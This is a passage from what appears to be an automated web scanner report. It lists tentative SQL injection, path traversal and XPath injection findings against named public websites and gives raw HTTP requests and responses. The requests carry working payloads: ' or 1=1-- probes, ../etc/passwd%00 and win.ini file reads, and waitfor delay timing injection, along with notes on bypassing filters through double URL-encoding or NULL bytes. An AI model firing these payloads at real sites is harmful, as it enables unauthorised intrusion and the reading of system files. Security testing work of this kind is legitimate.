Set-Cookie: reloadCheck=%2Ffavicon.ico%26%23039%3Bnull; Domain=.dealtime.com; Path=/
Set-Cookie: perm=countryCode%3Dus; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/
Set-Cookie: DealTimeUserID=Q2kuror0CK; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:39:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body id="error">
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealtime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: brc=www0.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/
Location: http://www0.dealtime.com/favicon.ico''
Set-Cookie: session=ts%3D2; Domain=.dealtime.com; Path=/
Content-Length: 0
Date: Sat, 02 Apr 2011 13:39:15 GMT
Connection: close

1.6. http://www.essortment.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.essortment.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:35:16 GMT
Connection: close

You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 13:35:17 GMT
Content-Length: 14756
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
1.7. http://www.ftd.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13030870'%20or%201%3d1--%20 and 13030870'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico13030870'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Sat, 02 Apr 2011 13:47:27 GMT
X-Varnish: 1965658938
Age: 14
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1965658938</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /favicon.ico13030870'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=BF7AFCBE5D2F105D000DE46EBF25E07E; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=BF7AFCBE5D2F105D000DE46EBF25E07E; Path=/; Domain=.ftd.com; expires=Sat, 02-04-2021 13:47:27 GMT
Vary: Accept-Encoding
X-Accelerator-Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-VR-Note: no-gzip: UA=curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 80223
Date: Sat, 02 Apr 2011 13:47:28 GMT
X-Varnish: 1841592671
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20101223/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our oner
...[SNIP]...
1.8. http://www.guitarcenter.com/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
SN: 88
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:15:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:10 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 27
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=ouzuzrhrhudggjo104yitfb0; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 10:15:10 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 10:15:10 AM; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: uid=2e7cae34-cedd-47d9-9f54-c586e23e3b35; expires=Mon, 02-May-2011 14:15:10 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:15:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...
1.9. http://www.inc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 02 Apr 2011 14:21:04 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Connection: close

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:21:05 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...
1.10. http://www.psu.edu/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:38 GMT
Server: Apache/1.3.41 (Unix)
Content-Type: text/html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</a> &gt; Error 404 - Page not found
           <!-- InstanceEndEditable -->
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:38 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT
ETag: "135d-400-42a6dbc7"
Accept-Ranges: bytes
Content-Length: 1024
Content-Type: image/x-icon

.PNG
.
...IHDR................a...    pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F...vIDATx.b....!e.v.{...1...W@.............?.._|d.../.....000310022+.
......@..E...}..
...[SNIP]...
1.11. http://www.psu.edu/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:30 GMT
Server: Apache/1.3.41 (Unix)
Content-Type: text/html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</a> &gt; Error 404 - Page not found
           <!-- InstanceEndEditable -->
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3''
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:30 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT
ETag: "135d-400-42a6dbc7"
Accept-Ranges: bytes
Content-Length: 1024
Content-Type: image/x-icon

.PNG
.
...IHDR................a...    pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F...vIDATx.b....!e.v.{...1...W@.............?.._|d.../.....000310022+.
......@..E...}..
...[SNIP]...
1.12. http://www.scholastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scholastic.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11468862'%20or%201%3d1--%20 and 11468862'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico11468862'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scholastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.64
Content-Type: text/html
X-Powered-By: ASP.NET
Location: http://www2.scholastic.com/browse/lessonplan.jsp?id=483
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:54:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSDACTBQ=JOFOAFGDDIPFMOBAKFPNGCPM; path=/
Cache-Control: private

Request 2

GET /favicon.ico11468862'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scholastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 5443
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:54:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSDACTBQ=KOFOAFGDFDKJCCJFLLJDMEJO; path=/
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error Page</title>
<link rel="stylesheet" href="/css/header.css" type="text/css">
<script type="text/javascript" type="text/javascript" src="/menu/templates/global.js"></script>
<!-- MSN -->
<script type="text/javascript" src="/menu/templates/msnkids.js"></script>
<!-- /MSN -->
</head>
<body >

<div id="schlPageWrapper">

<script type="text/javascript">imgRoot = "/universal/images/";</script>
<script type="text/javascript" src="/universal/universal.js"></script>


<div id="schlPageContent">

<div id="schlHeader">

<table border="0" cellpadding="0" cellspacing="0" id="innerHeader">
<tr valign="bottom">
<td id="schlChannel">&nbsp;</td>
<td>
<div id="schlSearchBox">
<form name="searchForm" action=" http://www2.scholastic.com/browse/search" method="get" onsubmit="return setItHead();"><div id="gSearch">
               <table border="0" cellpadding="0" cellspacing="0" width="278">
       <tr>
       <td id="txtSearch"><input type="text" size="20" name="query" value="" class="txtSearch" /></td>
       <td><input type="image" src="/images/nav3.o/btnNavSearch.gif" border="0" class="btnSearch" alt="Search" /></td>
       </tr>
       </table>
   </div>            
       
   </form>
</div>
</td>
</tr>
</table>


</div><!-- /header -->


<div id="schlMainContent">

<div id="schlContent">

<!--div id="schlSkyscraper">&nbsp;</div-->

<div id="schlLegacy">
<img src="/images/nav3.o/wrapper_box_top.jpg" width="743" height="12" alt="" class="dBlock" />
<div class="box743Borders">
<!--begin page content-->

<!-- REQUEST URI: /404error.asp -->
<!-- curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 -->
<!-- generic.html -->


<!-- ORIGINAL BODY TAG --
...[SNIP]...
2. File path traversal  previous  next
There are 4 instances of this issue:

2.1. http://www.bodybuilding.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bodybuilding.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bodybuilding.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny3
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:40:37 GMT
Content-Length: 30357
Connection: close

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html>
<head>
<!-- Rawberry -->
<title>Bodybuilding.com - PAGE NOT FOUND! 404 Error.</title>
<meta name
...[SNIP]...
server=""
s.channel="root"
s.products=""
s.prop30="B"
s.eVar30="B"
s.prop41="Anonymous"
s.eVar41="Anonymous"
s.prop1="Fun: Article"
s.eVar1="Fun: Article"
s.prop2="Article"
s.eVar2="Article"
s.prop33="Root: PAGE NOT FOUND! 404 Error."
s.eVar33="Root: PAGE NOT FOUND! 404 Error."
s.events="event3"
s.pageType=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_cod
...[SNIP]...
2.2. http://www.buzzfeed.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.buzzfeed.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzfeed.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Apr 2011 13:00:01 GMT
ETag: "1190105-69e2-49fef1ab65640"
Accept-Ranges: bytes
Content-Length: 27106
Vary: Accept-Encoding,User-Agent
X-BuzzFeed: feed5
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script type="text/javascript">
fb_is_enabled = false;

fb_is_enabled = true;


var BF_STATIC = {static_root: 'http://s-ak.buzzfed.com/static', image_root: 'http://s-ak.buzzfed.com', web_root: '', version: '1301693588', facebook_enabled: fb_is_enabled, fb_app_id:'45075597673', fb_api_key: 'c11330e934b70cdeed6
...[SNIP]...
2.3. http://www.cabelas.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cabelas.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabelas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 07:00:02 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=604800
Date: Sat, 02 Apr 2011 13:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html >
       <head>
       <title>Cabela's - Page Not Found</title>
       <!--[if lt IE
...[SNIP]...
<li class="heading">Other Ways to Shop Home &amp; Cabin:</li>
...[SNIP]...
2.4. http://www.info.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.info.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico..\..\..\..\..\..\..\..\..\..\winnt\win.ini was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico..\..\..\..\..\..\..\..\..\..\winnt\win.ini HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.info.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sat, 02 Apr 2011 13:42:41 GMT
Server: Apache
Set-Cookie: a=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1301751761+last_cmp++engineset+int-only; expires=Wed, 01-Apr-2037 20:50:37 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 52097

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - favicon.ico....................winntwin.ini - www.Info.com</title><link rel="shortcut icon" href="http:
...[SNIP]...
020039722EE73D3D91B91E26214CF" target="_blank" title="http://forum.emsisoft.com/Default.aspx?g=posts&t=6235" class=d>... PROGRA~1\Skype\Toolbars\INTERN~1\favicon.ico O9 - Extra ... Displaying WIN.INI: ; for 16-bit app support [fonts] ... C:\WINNT\PCHealth\HelpCtr\Binaries: ...</a>
...[SNIP]...
3. XPath injection  previous  next
There are 4 instances of this issue:

3.1. http://www.cartoonnetwork.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cartoonnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:44 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 29979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...
3.2. http://www.ning.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
X-XN-Trace-Token: 035d4f9a-70d6-4175-ab94-68258d4901cd
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=2888191c-8dd6-4fbf-b6df-ac955ebc0b1e;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:26:00 GMT
Set-Cookie: ning_session="nVdNOstw1Wwd3pQ9MfERZ5XA7iW5omP426d+IYw4032/qSqXv9ggV+DXyj999oWzF1tcrKfyFAU=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:26:00 GMT
XN-ResponseFrom: 10.16.47.166,(10.16.106.52,301,33)
Date: Sat, 02 Apr 2011 13:26:00 GMT
Set-Cookie: P=a%3A2%3A%7Bs%3A6%3A%22locale%22%3BN%3Bs%3A2%3A%22ab%22%3Bi%3A1691950182%3B%7D; expires=Tue, 30-Mar-2021 13:26:00 GMT; path=/
Location: http://www.ning.com/
Content-Type: text/html; charset=utf-8
Content-Length: 19093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>xp_subscribe('LogPageView', function(label_1, label_2, client_page_load_time, server_page_load_time) { xg_track_dynamic('PageView',{date:'xdate',host:'xhost',path:'xpath',user_agent:'xua',ip:'xip',cookie:'s',subdomain:'spretzel',screen_name:'s',section:'s',is_owner:'b0',is_admin:'b0',is_member:'b0',join_date:'80',referrer:'s',reload_count:'20',client_page_load_time_de
...[SNIP]...
3.3. http://www.thefind.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefind.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
